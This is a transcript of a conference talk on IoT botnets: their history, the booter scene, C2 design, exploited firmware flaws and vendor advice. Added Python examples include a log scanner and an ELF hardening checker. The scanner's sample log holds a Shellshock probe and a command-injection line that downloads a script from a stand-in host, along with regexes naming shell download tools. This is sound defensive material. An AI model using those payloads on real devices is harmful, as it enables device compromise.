[Intro theme song]
You see my botnet back there? I got Buddhist connected to my botnet
Got hella Buddhist, hella Buddhist, Buddhist, hella Buddhist, Buddhist, hella Buddhist, Buddhist
I got Buddhist connected to my botnet
Hanging out on Hack Forums, best believe I got warrants
Telling all who listen at my botnet, it's not boring
Modified Mariah and I'm mixing in the minor
Comes as no surprise, getting wrecked by a minor
Cover up his dropbear, looking for me everywhere
No, I'm really not there, places I will not share
Drop a couple backups, I know you won't find me
Buy a couple more smart balls, won't you kindly
Screen him, Captain Phillips, who the hell are you?
Wonder why your toaster's connected to, are you?
Why your toasters toastin'? I'm using it for roastin'
Some kid got busy boasting, now his mode on smoking
Keep the crypto flow and I need my money now
But I gotta go 'cause my mom said study now
I'm calling all the shots and it's time for me to score
I got a couple spots, hit me up on Discord
Botnet, I got hella booters; botnet, take over your rooters
Botnet, in your internet of things; botnet, man the shit hella stains
(chorus repeats)

Well, that was amazing. Thanks so much, Dave, for that amazing intro. I was not really sure what to think when I just got a PM saying that there was a theme song for my talk. So hi everybody, thanks for coming and hanging out. Hold on, let me make sure everybody can hear me right. Chat, say hi if you can hear me, just making sure; I've got a terrible microphone. All right, cool, okay, so let's get going.

So, my talk. I'll just get right into it. Who am I? I'm netspooky, senior reverse engineer at [redacted company]. I primarily work on embedded devices, firmware, industrial control systems, and taking apart proprietary network protocols. You may know me online as either
netspooky or you, and I contribute OSS tooling and other errata for threat intel, RE and offensive security.

All right, a little background on this. Why do this talk? I know there are a lot of people that have seen IoT botnets, whether they've been affected by one or have seen people talking about them online. I had done a bit of my own research and wanted to add a bit of perspective from my end, because I think botnets are definitely still incredibly prevalent. We are all affected by them whether we like it or not: if your work Slack is suddenly down because of somebody's fight on Xbox Live or Minecraft, this is affecting you in some way. But I don't think a lot of people take them seriously; a lot of people think it's script kiddie stuff, which is unfortunate, because it definitely is an issue that we all have to deal with.

So I spent a good amount of time collecting malware sources. I started doing this in about 2018, and I had been collecting and developing tools to analyze source code and analyze binaries, which I'll get into later. I still saw a lot of the commonly exploited vulnerabilities and wanted to know more about why they were so prevalent: why can you have 4 million hacked routers on your botnet? It's insane to me. So I wanted to inform others about the impact of their technology choices, specifically firmware devs and also consumers, and I also wanted to propose some ideas on how to address these. I should have given this talk about a year ago; it's just been pushed to the back burner a bit, but I tried to update it as much as I could, and I also had to cut out some parts, which I'll talk about as I go through the talk.

Here's the outline real quick. We're going to go over
a bit of IoT botnet history, then the actual botnet scene a little bit, talk about the architecture of botnets and how they spread and propagate, and then the firmware vulnerabilities that enable them and steps to move forward for vendors.

Starting off with IoT botnet history: what is an IoT botnet? If you're here watching IoT Village, you're probably aware of IoT issues and botnets in general, but for those who haven't seen anything about them, they're basically a network of hacked IoT devices: internet-connected devices like routers, set-top boxes, webcams, your toaster. The little toaster on here has a little script on how to scrape Shodan for links to routers. They're used primarily for DDoS, and sometimes for crypto mining and also for tunneling and proxying traffic. This talk is more cultural than technical, and I want to go through a lot of the confusing nomenclature that surrounds this, because there's a ton of it: people call botnets by a million different names, whether you're talking to a researcher or to a person who develops them, and there are a ton of different types.

So, a little bit of history. IoT botnets as they're known right now can be traced back to 2014-ish, when Lizard Squad came out with the malware with the most names of any malware: it's been termed Bashlite, it can also be called Lowe's bot, Torlus, LizKebab, LizardStresser, Ballpit, Gafgyt, and a bajillion other names. It was spread by exploiting Shellshock vulnerabilities; Shellshock came out in BusyBox-based devices of all kinds, so people were scanning the entire internet for Shellshock vulnerabilities, because they were all over the place and very, very common in a lot of IoT devices. When this
was actually happening, though, there were a lot of different botnets and bots being distributed, because there hadn't been as many sources as there are now. You've heard of Kaiten, which is an IRC-C2-based botnet that was spread a lot, as well as Perl bots, which are literally just DDoS bots written in Perl. The source code for this was leaked in 2015 and a lot of people started to work on it, and collectively, it's hard to choose one name for them, but I would say these would be categorized as Qbot, which is unrelated to the Qakbot malware that people also call Qbot. New devices that are still vulnerable to this exact same vulnerability appear online to this day.

Fast forward a couple of years: Mirai came out in 2016. It was used in some famous DDoS attacks, like the Dyn DDoS attack and the ones on Brian Krebs and some other people, but it was leaked shortly after some of those attacks happened, and people started to immediately use it, because it was a lot more streamlined than the previous versions of DDoS malware. A lot of the earlier stuff was really simple one-file bots and servers, very basic stuff over Telnet. Mirai was a lot more streamlined and very modular: there are different files, which made it easier to plug new exploits in, and it also made it easier to have access control for users that were coming on. It also had a bit better code; it was definitely still not the best, but a lot better than the previous code for LizKebab and Losebot. It also had a SQL server, which made running the server a lot easier for them. Since then, it seems like everybody has a botnet fork these days. There are other IoT botnets that are pretty major that have come out. A big one that you may have heard of was Satori, or Fbot, or Okiru, a pretty well-known Mirai fork that's a bit different from some of the
other ones, because a lot of them are just copy-pasted Stack Overflow answers fitted into some Golang and C code, but the person who was doing this one definitely knew what they were doing a bit more than most people, and that person actually just went to jail recently. We've also seen BrickerBot, the botnet that would basically infect and break IoT devices; there have been a few iterations of it, one in 2017 and then one recently, which I think was a 13-year-old kid or something like that. A newer one that's really interesting is Kaiji: Golang-based, cross-compiled, an SSH brute-forcer that actually installs a rootkit, or tries to, to establish persistence, which is really interesting; I'll get into that more later. Access R is another one that I've seen; I just threw it in there because I didn't hear anybody talking about it. It's more modular, but still crappy. There is a Bitcoin miner botnet that you may have seen; it's harder to do Bitcoin mining on an IoT device because they don't have as much CPU power and no GPU, but they're still out there. And I also did a write-up on some Mirai variants that are targeting FPGAs and some really exotic architectures, which I have a link to and citations for at the end here, or you can go on my website and see it.

Botnet activity growth: similarly to Qbot, Mirai just started popping up all over the place once it was leaked, and there became basically a huge marketplace for people trying to sell spots on the botnet. There are reseller markets, affiliate programs and incentives for having it grow. Also booting itself, DDoSing somebody's home router, became a really common thing for people to try and do, because it's just a way to knock people offline, especially if they're mad at them in Call of Duty or something. It's basically just the thing that people started to
do, and as these things develop and grow, like a thousand monkeys at a thousand terminals will eventually take out the internet, and that's kind of what's been happening.

We'll get a little bit into the scene here. The botnet scene at a glance: there are entire communities dedicated specifically to one botnet or one botnet group, and they are usually talking on Discord, sometimes their own forums or IRC. It was definitely more IRC back in the day, where people would have C2s connected to IRC, but nowadays it's more Discord where people are talking. Advertising is done on literally every single social media platform you can think of; I think somebody found Pinterest had somebody advertising botnets, but if you go on Instagram and literally search "botnet" or "Qbot" or "botnet setup", or YouTube, you will find somebody advertising their latest slammin' botnet. Booter time is generally sold to people for DDoS through a web panel or through a Telnet interface, but the main thing they're trying to do is just sell time on the botnet. You'll see here on the bottom, it might be a little small for some of you, just some advertisements for different botnets and also some videos on how to boot people offline and how to do it using just an Android, "Best Booters 2020"; these all have hundreds of thousands of views too, so these are people that are really going hard with the advertising.

The sources. I talked about the sources that have been modified by people; they're usually distributed as zips or RARs or whatever, and they are sold for about three hundred to five hundred dollars USD, from what I've seen. The authors typically change very little of the codebase; it usually just involves something simple like changing the ASCII art or changing the variable names, Ctrl-F and replace. Sometimes they might even
add a new exploit, which is always interesting. The exploits themselves, to load bots, are sometimes sold, but a lot of them are literally such that you can Google any part of the script and you will find the Exploit-DB link where they took it from. The ones that are sold, though, from Exploit-DB or Metasploit modules, are usually backdoored, and it's really funny: they just have a base64 blob that runs "import os" and then runs this, or "import sys" and runs that, whatever. When I was going through and finding a lot of these sources, I would find that when people would scam each other, or rip off somebody, or somebody had a fight with them, they would leak each other's source code, which is great for threat intel people and reverse engineers who want to figure out what's going on, because they would just be like, "hey, here's this person, here's everything they've done, here's their botnet and here's their code", and you can scoop it up and take a look at it.

Selling spots is the primary source of revenue, as I said. They're typically sold in weekly, monthly or lifetime plans; you can see a breakdown of plans over here, pretty cheap too. The lifetime plan is always really funny to me, because it really just means for the duration of the botnet's lifetime, and sometimes that does not last longer than three days or a month, depending on how bad their operation is. More enterprising people, people who are a bit more advanced, might use a web stressor, and they can sell access to that, with users and everything, through a web browser. There have been a few big web stressors that have been taken down and some that are still up; web stressor sources have leaked. There's so much surrounding a web stressor, it adds a bit of abstraction that makes it harder to manage. And then, finally, some people act as resellers and get a cut of the sales over time.

Who runs a botnet? IoT botnet
operators, based on what I've seen in the scene, are usually pretty young: high school age, sometimes college age. They have somewhat of an experience with computers, but they're usually not developers; they learn a lot through YouTube and through text files, which I have a collection of in the GitHub that I'll explain in a little bit, which are just tutorials on how to set them up: how to spin up a box, how to actually do the basic things like compile with GCC. A lot of the time, though, they really have no clue what they're doing, so you'll see people trying to get support for different botnets who are really confused about GCC or what access control is. More sophisticated people might have a web stressor or an API, like I said before. People use cryptocurrency instead of PayPal, which is very common for some reason, even though it's tied to your bank directly. In some cases, though, people will also use botnets for additional purposes like proxying traffic, so sometimes you'll see fly-by-night sort of VPN operations that might be doing something shady like routing their traffic through routers, and that's just their VPN somehow.

Why run an IoT botnet? Just as with most malware, there are a lot of similar reasons, but there's a lot that comes with the fact that there are a lot of younger kids involved. They usually do it for either money, because people can earn money from the sale of botnet spots, or attention: people seek attention for stuff even if it's not even a DDoS and it's just a regular production outage. Some people might say, "oh yeah, my group DDoSed these people and we're going to extort them for money", and then you look at their status pages and it's like, "oh yeah, sorry, we had a blip in
updating this thing and we're back now", which is always awesome. Supply and demand: there are definitely people who want to DDoS each other, and meeting that demand is something that's good for any young entrepreneur. Revenge is also big; I see a lot of people claiming that somebody doxxed them or DDoSed them, and they want to get back at them by getting their IP and booting them offline. People are also inspired a lot by past attacks, because people have seen what actually happens if somebody DDoSes and takes out the internet; they want to be doing that. And also, it's incredibly easy to set up an IoT botnet.

Let's take a little bit of time to go over the architecture of DDoS botnets. As I said before, earlier botnets used standalone bot files and C2 files that were just compiled with GCC, or uClibc for cross-compiling. They're very, very simple to set up and deploy. Some of them, for the C2 itself, used IRC for command and control, and they'd have very bare-bones IRC clients within their bots. But Mirai modernized it: there's an actual C2 protocol that is used, and they have a SQL backend for tracking bots and all that. Web stressors will use PHP and some other API stuff for managing the bots, but it's definitely evolved a lot more than it used to be five years ago, which is interesting to see.

The lifecycle of a botnet is usually very, very short; you don't see them for very long, not going to be over a month or two. Basically somebody will set up a C2 on a lax VPS host, they'll scan for vulnerable devices, they'll get some bots on their botnet, advertise their spots and then use it. And then the takedown goes one of two ways: either somebody like, say, Bad Packets Report will tweet out their botnet and tag the web host, and somebody will notice it and
get it taken down, or somebody else's botnet will start kicking their bots from the system and they won't be able to keep up and they'll lose power. But then it'll just keep happening again; this is just the same thing you see over and over again. Hold on one moment, I'll take a sip of water.

This inevitably leads to a king-of-the-hill game for botnets. They're very territorial: people are targeting one specific type of device with one specific vulnerability that they've coded into their variants, and then when somebody else gets the same idea, they'll start attacking and doing things like that, getting their bots on there. Anybody who touches the device usually already has root access, but they might have either some weird file system, or there's no way to really reconfigure it, or they might not know how to reconfigure the device to kick everybody else out. But basically every bot will only last as long as it can before somebody else takes its place, and also there are really no repercussions for this, so everyone's just kind of slamming on different IoT devices. Picture it as an IoT botnet operator watching their bot count drop.

Evasion is definitely an interesting aspect of this. There's a lot of very simplistic evasion that you'll see here. This one up at the top is somebody just renaming their process to "dropbear", which I guess works, but it's also used by everybody, so then everybody will just kill the dropbear process once they log on. Realistically, this is not to hide from any sort of firewall or any sort of AV or anything; it's only really used to evade other botnet operators. So they do things like process masking, they might learn about a different area of the file system that they can put a bot in, they might hide a backup bot in something like a cron job. It's always very, very primitive and very bespoke, and
I actually had a whole code review section that could have been an entire talk, but I had to cut it for time. There are a lot of very strange ways that people try to do evasion, which I would love to talk about at another date.

Bot killing: as I said before, people will do this. Take a look at this if you can see it on the side here: here's an array that's just full of a ton of different bot names, and every time they update this botnet, of which I have multiple versions, they would add more and more of these. You'll see they'll do things like iterate from one to however many and try to kill every process that's called that, or every single version of this specific bot or whatever. People will be aware of different botnets that are operating and what they name them, and then put them into their scripts, and it's a cat-and-mouse game, because nobody can fit everything in there; otherwise their binary is going to be full of strings that ultimately are going to get detected by people who are reverse engineering the malware. And so not some, not most, but nearly all bots and C2s, I would say all, have really silly vulnerabilities that make them incredibly easy to knock offline, and I don't really see too many of these techniques utilized or advertised by people, but in my next slide I'll show you something interesting.

Here's my non-live demo for a C2 killer. This is something that I found; I definitely was not the first person to find this, but it was part of my testing when I was researching these different things. It's incredibly easy to kill Mirai C2s. Take your screenshots or whatever; I really put this out on Twitter at some point. But yeah, if you send this to either the admin port or the heartbeat protocol port, it just segfaults the Mirai C2, and I've never seen anybody fix this; this is in every version of Mirai
that I've seen. Some people have claimed that it was fixed, but after reviewing every single one of them that I could find, I've never seen that.

The last little bit on the botnet scene here: when I was going through and doing this work, I ended up creating a tool to help me track all this stuff, and I put it out on GitHub. It hasn't been updated for a bit because I've gotten too many other projects to do, but it's a static analysis and classification tool for zip files and binaries and things like that; it just feeds it all into a big Elasticsearch database. I'm taking the next week off work, so I'm going to take some time to push my big update to this, but if you want to check it out, definitely do it. I have some new things like an API, different symbol hashes and key extraction techniques in there. It was mainly for me, for fast analysis: I was feeding either new source code or new bot binaries into this and just tracking them, but it works for other malware too. Also, I had a Twitter account that was deleted by Twitter for some reason; it was called Threat Land, which was the name of the project that I used to track all these sources. I have every Mirai and Qbot and other botnet, even beyond IoT; I tracked them all in a big repo called tlbots, and I have a few other repos if you want to check them out, for fraud tools and stuff. If you clone that, there's literally like a gigabyte's worth of zip files of every malware source code that I could find.

Now we're going to get into talking about vulnerabilities, and this aspect of it is a bit more stuff for devs, because I wanted to give info for developers who are working on IoT devices to take all of what I just said there and put it into context for their
actual security architecture. Let me take another sip of water.

Okay, so here we're peering into the void. If you've ever gone on GreyNoise, they have a lot of tags for different vulnerabilities themselves that people are scanning for, or just classes of malicious traffic. If you do a search just for "mirai", you'll see here, it's very tiny, that there are four and a half million results for unique devices that have been scanning with Mirai-like traffic, so that gives you a rough example of how many devices are actually infected and actively scanning. The other one is just a Shodan search for this "hacked router help SOS had dupe password" thing; that hack happened, I think, like four years ago, and there are still 6,500 devices that have been hacked and have this hostname, so it's always heartwarming to see, I guess.

What types of vulns are exploited by these botnets? It's always very basic stuff. We're talking about weak auth and auth bypass: either admin/admin as the credentials, or a page that you can run OS commands on that doesn't actually need a password to be interacted with. There's also command injection, like Shellshock and other really silly command injection stuff. There are also a lot of common exploits in specific services and libraries, like the Realtek UPnP SDK, which had a vuln that was in everything, so many different devices. GoAhead web server and ThinkPHP also have vulns that were in a lot of places; thousands and thousands of devices were affected by GoAhead. More rarely you'll see actual shellcode and binary exploits, which is always interesting to see, because you'll have devices that are using the same base address and they can just do a shellcode exploit very
easily. But they're not as common as you'd think, and I think it might be because people don't know how to code shellcode or how to inject shellcode in C when they're writing their bots, so who knows, but you'll see them in bot loaders for sure. A lot of other vectors include previously compromised devices: people sell lists of compromised devices for specific categories of devices. I don't actually know if there are any in my repo, but I have seen a bunch of them where people are basically just passing those things around.

Looking at the most targeted devices here: if you want to see what vulns are most leveraged by these botnets, I have a table here. Basically I went through every source code that I could find, there are several hundred unique source codes, and these are the main ones that people are using. A lot of them here don't actually have any CVE or CPE or any vendor acknowledgement, so you can only really find them by looking up what the traffic is or what the command injection attempt was in your log files. Actually, more than half of these don't have any CVE at all. The AVTech one, which I think is being used in the IoT CTF right now, doesn't have a CVE or anything; it's just a blog post that people have written about it. Same with some of these Netgear ones: the Netgear DGN1000 is a huge one that people have exploited, and I've never seen a CVE for it. The HNAP stuff, the Zyxel stuff, even GoAhead web server. And these aren't even SSH or Telnet brute-force stuff; a lot of this is buffer overflow or command injection, and some of these aren't even being tracked by anybody.
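The point above, that many of these vulns have no CVE and are only recognizable from the command injection attempt sitting in your web server logs, is easiest to see with a concrete log scanner. The following is an added example, not code from the talk or from the speaker's tools: it parses a simplified combined-style access log (constructed sample lines, not a real capture) and flags the three probe types the talk describes: a Shellshock function-definition header, a shell separator followed by a downloader in an URL-decoded query string, and repeated POSTs to a device login page. The log format, the `/login.cgi` endpoint and the threshold are assumptions for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log (not a real capture). Simplified combined format:
#   client-ip "request-line" status "user-agent"
SAMPLE_LOG = """\
203.0.113.5 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.7 "GET /cgi-bin/status HTTP/1.1" 200 "() { :; }; /bin/bash -c id"
198.51.100.9 "POST /login.cgi HTTP/1.1" 401 "-"
198.51.100.9 "POST /login.cgi HTTP/1.1" 401 "-"
198.51.100.9 "POST /login.cgi HTTP/1.1" 200 "-"
198.51.100.9 "GET /setup.cgi?cmd=ping%20127.0.0.1%3Bwget%20http%3A%2F%2Fexample.invalid%2Fx.sh HTTP/1.1" 200 "-"
203.0.113.11 "GET /images/logo.png HTTP/1.1" 200 "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
# Shellshock: a bash function definition "() {" arriving in a client-controlled field.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Command injection: a shell separator followed by the downloader or shell a bot
# loader typically chains in (wget/tftp/busybox/sh). Applied to the decoded target.
CMD_INJECTION_RE = re.compile(r"[;|`&$]\s*(?:wget|tftp|curl|busybox|nc|sh|/bin/)\b", re.I)
LOGIN_PATHS = {"/login.cgi"}   # assumed device login endpoint for this example
BRUTE_FORCE_THRESHOLD = 3      # POSTs to a login path from one IP before flagging


def parse_line(line: str):
    """Return the fields of one access-log line, with the request target URL-decoded."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["target"] = unquote(rec["target"])   # decode %3B, %20 ... so the regexes see real shell text
    return rec


def scan_log(text: str) -> list:
    """Run the three detections over every line and return findings in log order."""
    findings = []
    login_hits = Counter()
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if SHELLSHOCK_RE.search(rec["ua"]) or SHELLSHOCK_RE.search(rec["target"]):
            findings.append({"ip": rec["ip"], "rule": "shellshock", "detail": rec["ua"]})
        elif CMD_INJECTION_RE.search(rec["target"]):
            findings.append({"ip": rec["ip"], "rule": "command-injection", "detail": rec["target"]})
        if rec["method"] == "POST" and rec["target"].split("?")[0] in LOGIN_PATHS:
            login_hits[rec["ip"]] += 1
    # Volume-based rule: repeated login attempts from one source
    for ip, n in login_hits.items():
        if n >= BRUTE_FORCE_THRESHOLD:
            findings.append({"ip": ip, "rule": "auth-bruteforce", "detail": f"{n} login attempts"})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<14} {f['rule']:<18} {f['detail']}")
```

Decoding the target before matching is the step that matters: the injection in the sample is invisible as `%3Bwget` but obvious as `;wget`. In production the patterns would be fed from the traffic you actually see, which is exactly the "look at what the attempt was in your logs" workflow the talk describes for vulns without a CVE.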
When a new exploit comes out, though, botnets immediately start trying to load bots with whatever PoC people have, and it's usually IoT bots, and it's very annoying. So the infections spill over from that. These malware families are running on a super diverse array of architectures; every architecture you can think of has a Mirai variant for it at this point, because of cross-compiling. But this means that this can affect other hosts that aren't IoT, so people will try to get Mirai onto things like web servers using Drupalgeddon or Apache Struts or CouchDB or whatever thing is running; they're going to try to do that to have that be the scanner as well. These sorts of infection spillovers are really common, and sometimes you'll see IoT botnets using Drupalgeddon and you're like, what router is running Drupal? It's because they're trying to get onto everything.

Why are these devices so easy to exploit? We were talking about this in the last talk here, about supply chain issues: it's very difficult to validate the supply chain, which is a big one. There's vulnerable software and libraries that people use that they might not be able to change, or they don't have the people to even make the changes. Easy-to-guess default passwords is a huge one. Devices default to port forwarding and listening on the internet. Giant lists of vulnerable devices are passed around, which makes it even easier for people who don't know what they're doing to just start exploiting. And then it all comes down to insufficient or non-existent security practices in development.

Now we're going to get a little bit into firmware vulns and security practices. There was an awesome talk, I think two years ago at ShmooCon, about firmware vulns by CITL. A lot of stuff like vendor security practices on a binary level is almost non-existent, and there's even regression analysis to
show that firmware is actually becoming worse and having more vulnerabilities introduced in a 15-year dataset, which is insane to me. You see here every vendor that they looked at, and anything that's closer to the edge here is going to have more of these things like stack guards, non-executable stack, RELRO, ASLR. Things that are closer to the edge are scoring higher, which means that more binaries have these mitigations in place. But as you can see, there are very, very few that actually have anything on the graph, and the ones that do only have one or two, and there are very few. It's kind of sad; you want all of these things to be blue all the way, and there are just lines of blue, which is really disheartening.

Why is firmware so difficult to maintain? There are so many reasons for it. I have done firmware development before for embedded devices, and even with the experience that I had doing that, I could see all the echoes of this throughout the process. Re-architecting cost is a huge thing; cost is usually the biggest factor for why things aren't changing. But you can also be locked into a vendor contract, or a middleware contract, so you can only use drivers for this one piece of your kit, and you have to use it for a certain period of time. You might have unsupported chips or hardware to work with. Another huge thing is outdated toolchains: you might be using some toolchain from 2005, and that's how you build everything in 2020. There are also hardware constraints; sometimes your hardware itself might not support the SSL version that you need. That was an issue that I've had to deal with before, trying to figure out how you can jerry-rig a new SSL encryption scheme to support newer versions of TLS in firmware that's 15 years old.
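The two points above, that bot binaries are cross-compiled for every architecture and that firmware binaries mostly ship without stack guards, NX, RELRO or ASLR, can both be checked from the ELF headers alone. The following is an added example, not code from the talk, from CITL or from the speaker's tooling: a small ELF reader that reports the target architecture (32/64-bit, either endianness) and the four mitigations the talk lists, plus a per-binary score of the kind the vendor chart summarizes. The header-only `build_sample_elf` fixture is constructed for the demonstration and contains no code; the canary check is a string heuristic, as noted in the comments.

```python
import struct
import sys

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
ET_EXEC, ET_DYN = 2, 3
# e_machine values commonly seen in IoT firmware and cross-compiled bot binaries
MACHINES = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 42: "SuperH",
            62: "x86-64", 94: "Xtensa", 183: "AArch64", 243: "RISC-V"}


def analyze_elf(data: bytes) -> dict:
    """Return architecture and mitigation flags for an ELF image (32/64-bit, LE/BE)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                       # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if data[5] == 1 else ">"        # EI_DATA: 1 = little-endian, 2 = big-endian
    fmt = "HHIQQQIHHHHHH" if is64 else "HHIIIIIHHHHHH"
    e_type, e_machine, _, _, e_phoff, _, _, _, e_phentsize, e_phnum = \
        struct.unpack_from(end + fmt, data, 16)[:10]
    gnu_stack_flags, has_relro = None, False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, p_flags = struct.unpack_from(end + "II", data, off)
        else:   # Elf32_Phdr keeps p_flags at offset 24, after the address fields
            p_type = struct.unpack_from(end + "I", data, off)[0]
            p_flags = struct.unpack_from(end + "I", data, off + 24)[0]
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True
    return {
        "arch": MACHINES.get(e_machine, f"unknown({e_machine})"),
        "bits": 64 if is64 else 32,
        "endian": "little" if end == "<" else "big",
        "pie": e_type == ET_DYN,              # position-independent, so ASLR can move the image
        # A missing PT_GNU_STACK is treated as an executable stack, as the loader does.
        "nx": gnu_stack_flags is not None and not (gnu_stack_flags & PF_X),
        "relro": has_relro,
        # Heuristic: dynamically linked canary builds reference this symbol by name;
        # a stripped static binary can hide it, so treat False as "not proven".
        "canary": b"__stack_chk_fail" in data,
    }


def hardening_score(report: dict) -> int:
    """Number of the four mitigations present (0..4), one per binary like the CITL-style chart."""
    return sum(report[k] for k in ("pie", "nx", "relro", "canary"))


def build_sample_elf(*, bits: int, little_endian: bool, machine: int, pie: bool,
                     nx, relro: bool, canary: bool) -> bytes:
    """Constructed header-only ELF for the demo (no code). nx=None omits PT_GNU_STACK."""
    end = "<" if little_endian else ">"
    phdrs = []
    if nx is not None:
        phdrs.append((PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X)))
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    e_type = ET_DYN if pie else ET_EXEC
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1 if little_endian else 2, 1]) + bytes(9)
    if bits == 64:
        ehsize, phentsize = 64, 56
        hdr = struct.pack(end + "HHIQQQIHHHHHH", e_type, machine, 1, 0, ehsize, 0, 0,
                          ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack(end + "IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    else:
        ehsize, phentsize = 52, 32
        hdr = struct.pack(end + "HHIIIIIHHHHHH", e_type, machine, 1, 0, ehsize, 0, 0,
                          ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack(end + "IIIIIIII", t, 0, 0, 0, 0, 0, f, 0) for t, f in phdrs)
    return ident + hdr + body + (b"\0__stack_chk_fail\0" if canary else b"")


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # usage: python elfcheck.py <binary from an extracted firmware>
        samples = {sys.argv[1]: open(sys.argv[1], "rb").read()}
    else:                                      # constructed samples: a hardened desktop build vs a typical router build
        samples = {
            "hardened-x86-64": build_sample_elf(bits=64, little_endian=True, machine=62,
                                                pie=True, nx=True, relro=True, canary=True),
            "router-mips-be": build_sample_elf(bits=32, little_endian=False, machine=8,
                                               pie=False, nx=None, relro=False, canary=False),
        }
    for name, blob in samples.items():
        r = analyze_elf(blob)
        print(f"{name}: {r['arch']} {r['bits']}-bit {r['endian']}-endian score={hardening_score(r)}/4 {r}")
```

Point it at the binaries in an extracted firmware root and the score distribution is the same picture as the vendor chart: a typical MIPS router build scores 0 because it is a non-PIE executable with no PT_GNU_STACK entry, no RELRO segment and no canary symbol.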
Sometimes you also need to maintain backwards compatibility, which is a big thing; it makes this stuff very hard, because you have to include stuff that you might not want to. A lot of it, though, is a lack of dependable updates for users to update their devices; even if you have all the other things in place, sometimes people don't have a way to actually update the devices without some complicated process. Poor communication channels to even tell people about vulnerabilities is also a big thing, and vendors might not have any sort of channels for reporting bugs or telling people about bugs. And then a lack of modern security measures, like secure boot or the binary hardening we talked about before, or code signing: those are not really going to be in place, and it's hard to get those things back into your pipeline if you have to do a bunch of testing and you only have a couple of people working on the thing.

Why do we see a lot of this older stuff still working? Sometimes you'll actually see Qbots, or Kaiten bots, or even Perl bots trying to exploit stuff in your logs, or you download a binary, and it's because the vulnerabilities are still there. This is something that I had actually distilled into an analogy from mining: there are indicator minerals that prove that other things might be there. Say you're looking for diamonds; there are indicator minerals that prove that the thing you're looking for might be there. So the old security vulnerabilities that we're seeing are showing that there are not as many security practices being followed, which means that the older vulnerabilities are still going to work. We're
seeing that there's still command injection here in 2020, and you can still run a Qbot or a Perl bot on this device. This means that there's really not anything going into the actual process of making the binary or the devices any more secure. What's interesting is that this is rare in other classes of malware, like say for desktop computers, because there's no patch really that you can apply to one specific device or whatever. So each time that there's a new vuln that comes out, there are all these new devices that are added to the pool, but there are still all the routers from 2014 that had Shellshock vulnerabilities in them, and DVRs that still have auth bypass in them, and those are all just getting added to the pool. So here we are, just trying the same old techniques, and they're still getting the actual devices that they would have exploited before. It's kind of frustrating.

So moving forward, this is the big thing for vendors and people who are developers of firmware and embedded devices: what can we actually do to solve any of these problems here? We can only really fix them by having better development practices for security, by meeting the developers and the vendors where they're at, because we want them to be on top of their game and actually doing the work that we'd like them to put in, so that our toaster isn't DDoSing somebody because of some Mirai variant run by like a 14-year-old kid. So we have to actually talk to the vendors in the way that they already know and the way that they're already developing things. For vendors, I guess my big advice here is to invest in developer training, to establish best practices and create security testing pipelines, and to encourage researchers to actually find bugs and disclose them properly. We can mitigate some
of the existing bugs by encouraging safer use of IoT devices, but it only works so much, because imagine trying to explain to your parents how to turn off port forwarding on their router. They're not really going to understand it in the way that you might (I mean, they might), but it's sometimes hard to get end users to actually follow your guidelines at all; they might not even be able to be aware of it. But that's one specific way that we can mitigate that.

Establishing best practices, though, is a thing I wanted to highlight for a second here: auditing your development cycle itself. It definitely depends on what you're building, and you have to tailor it to that, and be able to audit and say, hey, yeah, we are using C, we are using this toolchain, we're using either GCC or uClibc or whatever to develop our firmware. But there are best practices for these things. So OWASP: something I did when I was doing firmware stuff, I had developers look at some of these OWASP cheat sheets, on things like toolchain hardening and input sanitization for web apps, and how to do other things according to the best practices that there are. There are tons of different ones like this; I just point to OWASP a lot because it's very accessible for a lot of people and it's free. Another big thing is CIS benchmarks; depending on what you're building, there are benchmarks for security that you can follow, which are super duper useful. You can even automate that; I had done Ansible CIS benchmarks before, and you can build those into toolchains pretty easily. And then also, if you really need to, hire a consultant to come in and do all this work with you and work through it with your team; that's definitely a huge thing for vendors.

Vulnerability disclosure, though, is probably my favorite
one to talk about, and the biggest one. So when you do find people that are actually poking at your stuff, allow them to disclose vulnerabilities. Please, if you are a vendor and you're listening: there are ways now, it's 2020, you can have a VDP, you can have a bug bounty. You have to go through the proper channels and make sure it's right for you, but there are a ton of resources; disclose.io has really good legal language and other resources for vendors. But yeah, people who do IoT research sometimes either get no response or they get, you know, sued for something. Establish a security contact, though, and listen to email. There's security.txt, which is a really easy way on your vendor website to just have an email that somebody who has an issue or a vulnerability can talk to and not feel like they're trying to chase you down. Because how many times do you see people on Twitter going, hey, does anybody have a vendor contact for this company, and nobody responds? If we have to go on Twitter to ask about this, not only does it draw more attention to the vulnerability, but it also makes you look bad. So definitely keep up with that stuff. Work with researchers too, because people who are bringing stuff up to you want to help you. If somebody wants to just use your device for crypto mining or to DDoS some kid on Minecraft, they're not going to tell you about it. So if you have a researcher that's here and talking to you, they want to help you, and you should definitely heed their advice. And have some open channels with your customers too, to get the word out about vulnerabilities: whether you do an internal thing, or you submit CVEs and then post them on Twitter, whatever you do, just have something so people can know to update their devices. Ultimately all of these are elements of a vulnerability disclosure program, so if you put this
